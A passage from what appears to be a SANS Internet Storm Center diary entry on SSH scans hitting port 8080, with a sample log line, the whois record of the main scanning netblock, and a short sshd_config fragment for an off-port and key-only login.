    For example: – – [03/Aug/2015:08:31:55 +0000] SSH-2.0-libssh2_1.4.3 501 303 – –

    The IP address in this example is, for now, the most prolific source of these scans:

    inetnum:        -
    netname:        CHINANET-JS
    descr:          CHINANET jiangsu province network
    descr:          China Telecom
    descr:          A12,Xin-Jie-Kou-Wai Street
    descr:          Beijing 100088
    country:        CN

    With very frequent scans for SSH servers, users often move them to an alternative port. I am not aware of a common configuration moving them to port 8080, but it is certainly possible that this has become somewhat a common escape port.

    Please let us know if you have any details to fill in. Any other sources for these scans? Any reason why someone would use port 8080 for an ssh server? If you use an alternative port, one more random would certainly be better, in particular if the port is not in default port lists (like the one used by nmap).

    As usual, hiding your SSH server on an off-port is good. But you certainly should still use keys, not passwords, to authenticate, and follow other best practices in configuring and maintaining your SSH server.
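
    For reference, the combination of an off-port and key-only authentication boils down to a few sshd_config lines; the port number below is an arbitrary example, not a recommendation of a specific value.

    # /etc/ssh/sshd_config fragment (restart sshd after editing)
    Port 53289
    PasswordAuthentication no
    ChallengeResponseAuthentication no
    PubkeyAuthentication yes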

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.